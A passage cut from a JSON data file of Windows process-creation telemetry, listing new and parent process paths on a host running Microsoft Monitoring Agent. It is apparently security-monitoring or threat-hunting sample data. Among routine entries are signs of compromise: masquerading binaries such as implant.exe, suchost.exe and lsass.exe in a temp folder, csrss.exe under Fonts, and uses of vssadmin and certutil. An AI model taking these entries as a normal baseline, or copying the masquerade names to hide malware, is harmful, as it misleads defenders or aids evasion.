State\\\\Resources\\\\222\\\\pmfexe.exe\",\"C:\\\\Windows\\\\System32\\\\cscript.exe\",\"C:\\\\Windows\\\\System32\\\\wbem\\\\WmiPrvSE.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\NativeDSC\\\\DesiredStateConfiguration\\\\ASMHost.exe\",\"C:\\\\Windows\\\\System32\\\\conhost.exe\",\"C:\\\\Windows\\\\SysWOW64\\\\wbem\\\\WmiPrvSE.exe\",\"C:\\\\Windows\\\\System32\\\\cscript.exe\"],\"ParentProcessName\":[\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\MonitoringHost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\NativeDSC\\\\DesiredStateConfiguration\\\\ASMHost.exe\",\"C:\\\\Windows\\\\System32\\\\svchost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\MonitoringHost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\MonitoringHost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\MonitoringHost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\NativeDSC\\\\DesiredStateConfiguration\\\\ASMHost.exe\",\"C:\\\\Windows\\\\System32\\\\svchost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\MonitoringHost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\MonitoringHost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\MonitoringHost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\NativeDSC\\\\DesiredStateConfiguration\\\\ASMHost.exe\",\"C:\\\\Windows\\\\System32\\\\svchost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\MonitoringHost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\MonitoringHost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\NativeDSC\\\\DesiredStateConfiguration\\\\ASMHost.exe\",\"C:\\\\Windows\\\\System32\\\\svchost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\MonitoringHost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\MonitoringHost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\MonitoringHost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\MonitoringHost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\NativeDSC\\\\DesiredStateConfiguration\\\\ASMHost.exe\",\"C:\\\\Windows\\\\System32\\\\svchost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\MonitoringHost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\MonitoringHost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\MonitoringHost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\MonitoringHost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\NativeDSC\\\\DesiredStateConfiguration\\\\ASMHost.exe\",\"C:\\\\Windows\\\\System32\\\\svchost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\MonitoringHost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\MonitoringHost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\MonitoringHost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\NativeDSC\\\\DesiredStateConfiguration\\\\ASMHost.exe\",\"C:\\\\Windows\\\\System32\\\\svchost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\MonitoringHost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\MonitoringHost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\MonitoringHost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\NativeDSC\\\\DesiredStateConfiguration\\\\ASMHost.exe\",\"C:\\\\Windows\\\\System32\\\\svchost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\MonitoringHost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\MonitoringHost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\MonitoringHost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\NativeDSC\\\\DesiredStateConfiguration\\\\ASMHost.exe\",\"C:\\\\Windows\\\\System32\\\\svchost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\MonitoringHost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\MonitoringHost.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Diagnostics\\\\UserTmp\\\\rundll32.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Diagnostics\\\\UserTmp\\\\rundll32.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Diagnostics\\\\UserTmp\\\\rundll32.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\MonitoringHost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\NativeDSC\\\\DesiredStateConfiguration\\\\ASMHost.exe\",\"C:\\\\Windows\\\\System32\\\\svchost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\MonitoringHost.exe\",\"C:\\\\Windows\\\\System32\\\\svchost.exe\",\"C:\\\\Windows\\\\System32\\\\svchost.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\net.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\net.exe\",\"C:\\\\Windows\\\\System32\\\\svchost.exe\",\"C:\\\\Windows\\\\System32\\\\Dism.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\Dism.exe\",\"C:\\\\Windows\\\\System32\\\\services.exe\",\"C:\\\\Windows\\\\System32\\\\svchost.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\net.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\net.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\services.exe\",\"C:\\\\Diagnostics\\\\UserTmp\\\\regsvr32.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Diagnostics\\\\UserTmp\\\\suchost.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Diagnostics\\\\UserTmp\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Diagnostics\\\\UserTmp\\\\cmd.exe\",\"C:\\\\Diagnostics\\\\UserTmp\\\\powershell.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Diagnostics\\\\UserTmp\\\\powershell.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Diagnostics\\\\UserTmp\\\\powershell.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Diagnostics\\\\UserTmp\\\\powershell.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Diagnostics\\\\UserTmp\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Diagnostics\\\\UserTmp\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Diagnostics\\\\UserTmp\\\\powershell.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Diagnostics\\\\UserTmp\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Diagnostics\\\\UserTmp\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Diagnostics\\\\UserTmp\\\\certutil.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Diagnostics\\\\UserTmp\\\\implant.exe\",\"C:\\\\Diagnostics\\\\UserTmp\\\\implant.exe\",\"C:\\\\Diagnostics\\\\UserTmp\\\\implant.exe\",\"C:\\\\Diagnostics\\\\UserTmp\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Diagnostics\\\\UserTmp\\\\powershell.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\services.exe\",\"C:\\\\Windows\\\\System32\\\\svchost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\MonitoringHost.exe\",\"C:\\\\Diagnostics\\\\UserTmp\\\\powershell.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Diagnostics\\\\UserTmp\\\\powershell.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\net.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\net.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\net.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\net.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\net.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\vssadmin.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Diagnostics\\\\UserTmp\\\\wuauclt.exe\",\"C:\\\\Windows\\\\SoftwareDistribution\\\\cscript.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\MonitoringHost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\NativeDSC\\\\DesiredStateConfiguration\\\\ASMHost.exe\",\"C:\\\\Windows\\\\System32\\\\svchost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\MonitoringHost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\MonitoringHost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\MonitoringHost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\NativeDSC\\\\DesiredStateConfiguration\\\\ASMHost.exe\",\"C:\\\\Windows\\\\System32\\\\svchost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\MonitoringHost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\MonitoringHost.exe\",\"C:\\\\Windows\\\\System32\\\\svchost.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Diagnostics\\\\UserTmp\\\\lsass.exe\",\"C:\\\\Windows\\\\SoftwareDistribution\\\\cscript.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\svchost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\MonitoringHost.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Diagnostics\\\\UserTmp\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Diagnostics\\\\UserTmp\\\\reg.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\Fonts\\\\csrss.exe\",\"C:\\\\Windows\\\\System32\\\\win32calc.exe\",\"C:\\\\Windows\\\\System32\\\\services.exe\",\"C:\\\\Windows\\\\System32\\\\win32calc.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Diagnostics\\\\UserTmp\\\\rundll32.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\MonitoringHost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\MonitoringHost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\NativeDSC\\\\DesiredStateConfiguration\\\\ASMHost.exe\",\"C:\\\\Windows\\\\System32\\\\svchost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\MonitoringHost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\MonitoringHost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\NativeDSC\\\\DesiredStateConfiguration\\\\ASMHost.exe\",\"C:\\\\Windows\\\\System32\\\\svchost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\MonitoringHost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\MonitoringHost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\MonitoringHost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\NativeDSC\\\\DesiredStateConfiguration\\\\ASMHost.exe\",\"C:\\\\Windows\\\\System32\\\\svchost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\MonitoringHost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\MonitoringHost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\MonitoringHost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\NativeDSC\\\\DesiredStateConfiguration\\\\ASMHost.exe\",\"C:\\\\Windows\\\\System32\\\\svchost.exe\",\"C:\\\\Windows\\\\System32\\\\svchost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\MonitoringHost.exe\",\"C:\\\\WindowsAzure\\\\GuestAgent_2.7.41491.901_2019-01-14_202614\\\\WaAppAgent.exe\",\"C:\\\\WindowsAzure\\\\GuestAgent_2.7.41491.901_2019-01-14_202614\\\\CollectGuestLogs.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\MonitoringHost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\MonitoringHost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\MonitoringHost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\NativeDSC\\\\DesiredStateConfiguration\\\\ASMHost.exe\",\"C:\\\\Windows\\\\System32\\\\svchost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\MonitoringHost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\MonitoringHost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\MonitoringHost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\NativeDSC\\\\DesiredStateConfiguration\\\\ASMHost.exe\",\"C:\\\\Windows\\\\System32\\\\svchost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\MonitoringHost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\MonitoringHost.exe\",\"C:\\\\Windows\\\\System32\\\\svchost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\MonitoringHost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\NativeDSC\\\\DesiredStateConfiguration\\\\ASMHost.exe\",\"C:\\\\Windows\\\\System32\\\\svchost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\MonitoringHost.exe\",\"C:\\\\Windows\\\\System32\\\\svchost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\MonitoringHost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\MonitoringHost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\NativeDSC\\\\DesiredStateConfiguration\\\\ASMHost.exe\",\"C:\\\\Windows\\\\System32\\\\svchost.exe\",\"C:\\\\Windows\\\\System32\\\\svchost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\MonitoringHost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\MonitoringHost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\MonitoringHost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\NativeDSC\\\\DesiredStateConfiguration\\\\ASMHost.exe\",\"C:\\\\Windows\\\\System32\\\\svchost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\MonitoringHost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\MonitoringHost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\NativeDSC\\\\DesiredStateConfiguration\\\\ASMHost.exe\",\"C:\\\\Windows\\\\System32\\\\svchost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\MonitoringHost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\MonitoringHost.exe\",\"C:\\\\Windows\\\\System32\\\\svchost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\MonitoringHost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\NativeDSC\\\\DesiredStateConfiguration\\\\ASMHost.exe\",\"C:\\\\Windows\\\\System32\\\\svchost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\MonitoringHost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\MonitoringHost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\NativeDSC\\\\DesiredStateConfiguration\\\\ASMHost.exe\",\"C:\\\\Windows\\\\System32\\\\svchost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\MonitoringHost.exe\",\"C:\\\\WindowsAzure\\\\GuestAgent_2.7.41491.901_2019-01-14_202614\\\\CollectGuestLogs.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\MonitoringHost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\MonitoringHost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\NativeDSC\\\\DesiredStateConfiguration\\\\ASMHost.exe\",\"C:\\\\Windows\\\\System32\\\\svchost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\MonitoringHost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\MonitoringHost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\MonitoringHost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\NativeDSC\\\\DesiredStateConfiguration\\\\ASMHost.exe\",\"C:\\\\Windows\\\\System32\\\\svchost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\MonitoringHost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\MonitoringHost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\NativeDSC\\\\DesiredStateConfiguration\\\\ASMHost.exe\",\"C:\\\\Windows\\\\System32\\\\svchost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\MonitoringHost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\MonitoringHost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\MonitoringHost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\MonitoringHost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\NativeDSC\\\\DesiredStateConfiguration\\\\ASMHost.exe\",\"C:\\\\Windows\\\\System32\\\\svchost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\MonitoringHost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\MonitoringHost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\MonitoringHost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\NativeDSC\\\\DesiredStateConfiguration\\\\ASMHost.exe\",\"C:\\\\Windows\\\\System32\\\\svchost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\MonitoringHost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\MonitoringHost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\MonitoringHost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\NativeDSC\\\\DesiredStateConfiguration\\\\ASMHost.exe\",\"C:\\\\Windows\\\\System32\\\\svchost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\MonitoringHost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\MonitoringHost.exe\",\"C:\\\\Windows\\\\System32\\\\svchost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\MonitoringHost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\NativeDSC\\\\DesiredStateConfiguration\\\\ASMHost.exe\",\"C:\\\\Windows\\\\System32\\\\svchost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\MonitoringHost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\MonitoringHost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\ICT 2\\\\CMF-64\\\\DesiredStateConfiguration\\\\DscRun.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\MonitoringHost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\MonitoringHost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\NativeDSC\\\\DesiredStateConfiguration\\\\ASMHost.exe\",\"C:\\\\Windows\\\\System32\\\\svchost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\MonitoringHost.exe\",\"C:\\\\Program 